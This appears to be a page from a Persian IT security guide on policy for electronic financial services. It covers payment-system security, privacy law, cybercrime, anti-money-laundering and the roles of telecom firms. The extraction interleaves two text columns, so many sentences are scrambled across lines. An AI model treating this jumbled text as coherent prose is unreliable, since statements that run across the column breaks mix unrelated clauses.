‫ﺳﻴﺎﺳﺘﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﻮﺟـﻪ ﺧﺎﺻـﻲ ﺑـﻪ ﺍﻳـﻦ ﺗـﻮﺍﺯﻥ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ‪ ،‬ﺧـﺪﻣﺎﺕ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺑﻮﺳـﻴﻠﺔ‬
‫ﺩﺍﺷﺖ‪.‬‬ ‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﻧﺸﺎﻧﻬﺎ‪ ،‬ﻛﻠﻴـﺪﻫﺎ ﻭ ﻳـﺎ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺯﻳـﺴﺘﻲ؛ ﻛـﻪ‬
‫ﻫﻤﮕــﻲ ﻫﻮﻳــﺖ ﮔﺮﻭﻫﻬــﺎ ﻳــﺎ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﺗــﺼﺪﻳﻖ‬
‫ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﻻﺯﻣﺔ ﺭﻓـﺎﻩ‪ ،‬ﺁﺳـﺎﻳﺶ ﻭ ﺳـﻼﻣﺖ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻋﻤﻮﻣﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪ ﻭ ﺍﺯ ﺍﻳﻨﺮﻭ ﻳﻚ ﺟـﺰﺀ ﺍﺻـﻠﻲ ﺿـﻮﺍﺑﻂ‬
‫ﺁﻥ‪ ،‬ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﺑﻪ ﻣﻨﻈﻮﺭ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻡ ﺑﻮﺩ‪ .‬ﺍﻣـﺎ ﺩﺭﺣـﺎﻝ‬ ‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻋﻼﻭﻩ ﺑﺮ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺠﻢ ﻗﺎﺑﻞ‬
‫ﺣﺎﺿـﺮ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺧـﺪﻣﺎﺕ ﺍﻭﻟﻴــﺔ‬ ‫ﺗﻮﺟﻬﻲ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻓﻲﻣﺎﺑﻴﻦ ﻋﺮﺿـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻳﻚ ﺿﺮﻭﺭﺕ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪.‬‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺷﺮﻛﺘﻬﺎ ﺷﺎﻣﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ‪ISP ،٣٠‬ﻫـﺎ ﻭ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ‬
‫ﺍﺯ ﻟﺤﺎﻅ ﺗﺎﺭﻳﺨﻲ‪ ،‬ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﻣﻨﻄـﻖ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺟﺪﻳـﺪ‬
‫ﺿﺎﺑﻄﻪﻣﻨﺪ ﺷﺪﻩ ﻛﻪ ﺩﺭ ﻧﻘـﻞ ﻭ ﺍﻧﺘﻘـﺎﻻﺕ ﻣـﻨﻈﻢ ﻛـﺎﻻ ﻭ ﭘـﻮﻝ‪،‬‬
‫ﻻ ﺑﻌﻨـﻮﺍﻥ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﻛﻠﻴـﺪﻱ ﺧـﺪﻣﺎﺕ ﻛﻮﺗـﺎﻩﻣـﻮﺝ‪،‬‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﺎﻻﺗﺮﻳﻦ ﻣﻴﺰﺍﻥ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ؛ ﻭ‬
‫ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻓﻌﺎﻟﻴﺖ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨﺪ ﺍﻋﺘﻤﺎﺩ ﻣﺮﺩﻡ ﻫـﺴﺘﻨﺪ‪،‬‬
‫ﺧﺪﻣﺎﺕ ﻣﻴﺰﺑﺎﻧﻲ‪ ،‬ﺧﺪﻣﺎﺕ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﻭ ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺧﺪﻣﺎﺕ‬
‫ﺑﺎﻳﺪ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ﺳﺎﻟﻢ‪ ،‬ﻣﻨﻄﻘﻲ‪ ،‬ﻭ ﻣﺤﺘﺎﻃﺎﻧﻪ ﭘﻴﺶ ﺑﺒﺮﻧـﺪ‪ .‬ﺑـﺎ‬
‫ﺯﻳﺮﺑﻨﺎﻳﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ‪.‬‬
‫ﻧﺰﺩﻳﻚﺷـﺪﻥ ﺻـﻨﻌﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﻭ ﺑﺨـﺶ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻳﻜﺪﻳﮕﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺍﻫﻤﻴﺖ ﻭ ﺿﺮﻭﺭﺕ ﺍﻳﺠـﺎﺩ ﺳﻴﺎﺳـﺖ‬ ‫ﻣﺎﻟﻜﻴﺖ ﺻﻨﺎﻳﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻣـﻮﺭ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻋﻤﻮﻣﻲ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﮔﺎﻫﺎﻧﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺑﻴﺸﺘﺮ ﻣﻲﺷﻮﺩ ﺗﺎ ﺗﻀﻤﻴﻦ‬ ‫ﺑﺎﻋﺚ ﻃـﺮﺡ ﺳـﺆﺍﻻﺕ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺩﺭﺑـﺎﺭﺓ ﺳﻴﺎﺳـﺖ ﺭﻗـﺎﺑﺘﻲ ﻭ‬
‫ﻛﻨﺪ ﻛﻪ ﺩﻭﻟﺖ‪ ،‬ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻣﺮﺩﻡ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺳـﺘﻔﺎﺩﺓ‬ ‫ﻛﺸﻤﻜﺸﻬﺎﻱ ﺑﺎﻟﻘﻮﻩ ﺑﺮﺍﻱ ﻛـﺴﺐ ﻣﻨـﺎﻓﻊ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺧﻮﺩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺍﻳﻤﻦ ﻣﺎﻟﻲ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ‪.‬‬ ‫ﺳﻴﺎﺳــﺖ ﺭﻗــﺎﺑﺘﻲ ﻣــﻲﺗــﻮﺍﻥ ﭘﺮﺳــﻴﺪ‪ :‬ﺁﻳــﺎ ﻧﻘــﺸﻬﺎﻱ ﭼﻨﺪﮔﺎﻧــﺔ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺭﻗﺎﺑـﺖ ﺑـﻮﻳﮋﻩ ﺩﺭ‬
‫ﺩﺭ ﺗﻬﻴــﺔ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻋﻤــﻮﻣﻲ ﺑــﻪ ﻣﻨﻈــﻮﺭ ﺍﻳﺠــﺎﺩ ﻳــﺎ ﺍﺻــﻼﺡ‬
‫ﻻ ﺑﺮﺍﻱ ﺍﺭﺍﺋـﻪ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ‪،‬‬ ‫ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ‪ -‬ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﻪ ﻫﺸﺖ ﺭﻛـﻦ ﻣﻬـﻢ ﺗﻮﺟـﻪ‬
‫ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺩ ﺩﺍﺭﻧﺪ ‪ -‬ﻣﻨﺠﺮ ﺷﻮﺩ؟ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ‬
‫ﺩﺍﺷﺖ‪:‬‬
‫ﻳﻜﭙﺎﺭﭼﮕﻲ ﺧـﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺷـﺮﻛﺖ ﺩﺭﺑـﺎﺭﺓ‬
‫ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ ﻣﻨﺎﺳﺐ؛‬ ‫•‬ ‫ﮔــﺰﺍﺭﺵ ﺩﻗﻴــﻖ ﻭ ﻓــﻮﺭﻱ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﭼﮕﻮﻧــﻪ ﺗــﻀﻤﻴﻦ‬
‫ﺗﻤﻬﻴــﺪﺍﺕ ﻓﻨــﻲ ﻭ ﻣــﺪﻳﺮﻳﺘﻲ ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ‬ ‫•‬ ‫ﻣﻲﺷﻮﺩ؟ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﺭﻭﻧﺪ ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣـﻮﺭ ﺑـﻪ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ؛‬ ‫ﺛﺎﻟﺚ‪ ،‬ﺍﻫﻤﻴﺖ ﺍﺻﻼﺡ ﺣﻮﺯﺓ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﺯ ﺭﺃﺱ ﻫﺮﻡ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﻧﻈﺎﺭﺕ ﻗﻮﻱ ﻭ ﭘﻴﺸﮕﻴﺮﻱ؛ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻬﺘـﺮ‬ ‫•‬ ‫ﺩﺭ ﺻﻨﻌﺘﻲ ﺑـﺎ ﭼﻨـﻴﻦ ﻣﺠﻤﻮﻋـﺔ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺭﺍ‬
‫ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﻭ ﻻﻳـﻪﺑﻨـﺪﻱﺷـﺪﺓ‬ ‫ﻻ ﺩﺭ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﻴﺎﻥ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﻭ‬ ‫ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣــﺪﻳﺮﻳﺖ ﺧﻄــﺮ؛ ﺍﺯ ﺟﻤﻠــﻪ ﺍﻣﻨﻴــﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺑــﺮﺍﻱ‬ ‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺯ ﻗـﺴﻤﺘﻲ ﺍﺯ ﻫﺰﻳﻨـﺔ ﻗـﺮﺍﺭﺩﺍﺩ‬
‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ؛‬ ‫ﺧﺪﻣﺎﺕ ﺑﻌﻨﻮﺍﻥ ﺿﻤﺎﻧﺖ ﻛﺎﺭﺁﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﻭﻟﻲ ﺣﺘـﻲ ﺑـﺎ‬
‫ﻲ ﺑﻴﻤـﻪ ﺑﺘﻮﺍﻧﻨـﺪ‬
‫ﭼﺎﺭﭼﻮﺑﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻ ﹺ‬ ‫•‬ ‫ﻲ ﻓﻌﺎﻟﻴـﺖ‬‫ﺍﻳﻦ ﻭﺟﻮﺩ ﻫﻢ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﻣـﺴﺌﻠﻪ ﻛـﺎﺭﺁﻳ ﹺ‬
‫ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻴﻤﻪ ﻛﻨﻨﺪ ﻭ ﺩﺭ‬ ‫ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﭘﺮﺩﺍﺧﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻛﻨﺎﺭ ﺁﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻳﻦ ﺣﻮﺯﻩ ﺭﺍ ﺑـﺎ ﺍﻳﺠـﺎﺩ ﺗﻌﻬـﺪﺍﺕ‬
‫ﻣﺎﻟﻲ ﺑﺎﺯﭘﺮﺩﺍﺧﺘﻬﺎ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ؛‬ ‫ﻲ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‪،‬‬ ‫ﺩﺭ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ‬
‫ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ؛‬ ‫•‬ ‫ﻣﻨﺎﻓﻊ ﻋﻤﻮﻣﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ‬
‫ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ؛‬ ‫•‬ ‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻭ‬
‫ﺁﻣﻮﺯﺵ ﺷﻬﺮﻭﻧﺪﺍﻥ‪ ،‬ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﻭ ﻣﺪﻳﺮﻳﺖ ﺩﺭﺑﺎﺭﺓ ﻣـﺴﺎﺋﻞ‬ ‫•‬ ‫ﻣﺴﺎﺋﻠﻲ ﻧﻈﻴﺮ ﻫﺰﻳﻨﻪ‪ ،‬ﻛﻴﻔﻴﺖ ﺧﺪﻣﺎﺕ‪ ،‬ﻭ ﻧﻮﺁﻭﺭﻱ ﺑـﻪ‬
‫ﺍﻣﻨﻴﺘﻲ؛ ﻭ‬ ‫ﻳﻚ ﺗﻮﺍﺯﻥ ﻣﻌﻘـﻮﻝ ﺭﺳـﻴﺪ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺿـﻮﺍﺑﻂ ﻭ‬
‫ﻳﻚ ﺳﺎﺧﺘﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻻﻳﻪﺑﻨﺪﻱ ﺷﺪﻩ‪.‬‬ ‫•‬
‫‪30‬‬ ‫‪Hosting Companies‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٣٠‬‬

‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ‬ ‫ﺭﻛﻦ ﺍﻭﻝ‪:‬‬


‫ﺩﺭ ﺗﻬﻴﺔ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺑﺎﻳـﺪ ﺗﻤـﺎﻡ‬ ‫ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ‬
‫ﺍﺟﺰﺍﻳﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﺪ ﻧﻈـﺮ‬
‫ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺳـﺎﻳﺮ ﺧـﺪﻣﺎﺕ‬
‫ﻗﺮﺍﺭ ﺩﺍﺩ‪ .‬ﻫﻤﺔ ﺍﻳﻦ ﺍﺟﺰﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻛﺎﺭ ﻛﻨﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ‬
‫ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻣﺜـﻞ ﺗﻮﺯﻳـﻊ ﻭ ﺩﺍﺩ ﻭ ﺳـﺘﺪ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ( ﺍﻧﺠـﺎﻡ‬
‫ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻤﻬﺎ ﺣﻔﺎﻇﺖ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﻌﻼﻭﻩ‬
‫ﻣﻲﺷﻮﺩ ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺗﻮﺳـﻌﺔ ﻗـﻮﺍﻧﻴﻦ‪ ،‬ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺷـﻬﺎ‪ ،‬ﺑﺎﻳـﺪ‬
‫ﻭﺟﻮﺩ ﺳﻴﺎﺳﺖ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺩﺭ ﺗﻤﺎﻣﻲ ﺧـﺴﺎﺭﺍﺕ‬
‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ‪.‬‬
‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺣﻤﻼﺕ ﻭ ﺿﺎﻳﻌﺎﺕ ﺑﺘﻮﺍﻥ ﮔﺰﺍﺭﺷﺎﺕ ﺩﻗﻴﻖ ﻭ‬
‫ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻋﻤﻠﻴﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗـﺄﻣﻴﻦ‬
‫ﺍﺭﺯﺷﻤﻨﺪﻱ ﺗﻬﻴﻪ ﻛﺮﺩ‪ .‬ﺻﺮﻑ ﻭﺟـﻮﺩ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻛﻨﻨﺪ ﻭ ﻗﻮﺍﻧﻴﻦ ﺟﻨﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺩﺭ ﺑﺮ ﮔـﺮﻓﺘﻦ ﺍﻳـﻦ ﻧـﻮﻉ ﺟـﺮﺍﺋﻢ‬
‫ﻻ ﻣﺆﺳـﺴﺔ ﻣـﺎﻟﻲ ﻭ ﺍﺩﺍﺭﻩﻛﻨﻨـﺪﮔﺎﻥ ﺁﻥ ﺩﺭ‬ ‫ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﺍﺻﻼﺡ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻣﻘﺎﺑﻞ ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﺗﺪﺍﺑﻴﺮ ﻻﺯﻡ ﺭﺍ ﺍﻧﺪﻳﺸﻴﺪﻩﺍﻧﺪ‪.‬‬
‫ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﻭ ﭼـﺎﺭﭼﻮﺏ ﻗـﺎﻧﻮﻧﻲ ﺑـﺮﺍﻱ ﺧـﺪﻣﺎﺕ‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬ ‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺗﻮﺟﻪ ﺩﺍﺷﺖ‪:‬‬
‫ﻗﺎﻧﻮﻥ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺣﻔﺎﻇﺖ ﻭ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﺣﻔﺎﻇـﺖ‬ ‫ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛‬ ‫•‬
‫ﺍﺯ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﻭ ﺳﺎﻳﺮ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺗﺠﺎﺭﻱ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴـﺮﺩ‬ ‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ؛‬ ‫•‬
‫ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻣﻮﺭﺩ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺍﻋـﻼﻡ‬ ‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ؛‬ ‫•‬
‫ﻛﻨﺪ‪ .‬ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎﻳﻲ ﻫﻤﭽﻨﺎﻥ ﺩﺭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬ ‫ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ؛‬ ‫•‬
‫ﺷﻬﺮﻭﻧﺪﺍﻧﺶ ﻃﺒﻖ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ )ﻣـﺼﻮﺏ ﺳـﺎﻝ‬ ‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ؛ ﻭ‬ ‫•‬
‫‪ (۱۹۹۵‬ﭘﻴﺸﺘﺎﺯ ﺍﺳﺖ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ‪ ،‬ﻗﺎﻧﻮﻥ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬ ‫ﺯﻳﺮﺳﺎﺧﺖ ﺍﺟﺮﺍﻳﻲ‪.‬‬ ‫•‬
‫ﺑﺎﻳﺪ ﺍﺻﻮﻝ ﺍﺳﺘﻔﺎﺩﺓ ﻋﺎﺩﻻﻧﻪ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ )ﺷـﺎﻣﻞ ﺗﻮﺟـﻪ‪ ،‬ﺍﻧﺘﺨـﺎﺏ‪،‬‬
‫ﺍﻳﻦ ﺷﺶ ﺣﻮﺯﺓ ﺳﻴﺎﺳﺖ‪ ،‬ﻗﺎﻧﻮﻥ ﻭ ﺍﺟﺮﺍ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺑﺎﻳﺪ ﺭﻭﺍﺑـﻂ‬
‫ﺩﺳﺘﺮﺳﻲ ﻭ ﺣﺪﺍﻗﻞ ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﻜﻤﻴﻞ ﻣﻌﺎﻣﻠﻪ( ﺭﺍ ﺷﺎﻣﻞ ﺷﻮﺩ‪.‬‬ ‫ﺍﺑﺘﺪﺍﻳﻲ ﻣﻴﺎﻥ ﺗﻤـﺎﻣﻲ ﺫﻳﻨﻔﻌـﺎﻥ ﻭ ﺳـﭙﺲ ﺗﺮﺍﻛﻨـﺸﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ‬
‫‪٣١‬‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺟﺮﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﻳﻜﻲ‬
‫ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ‬
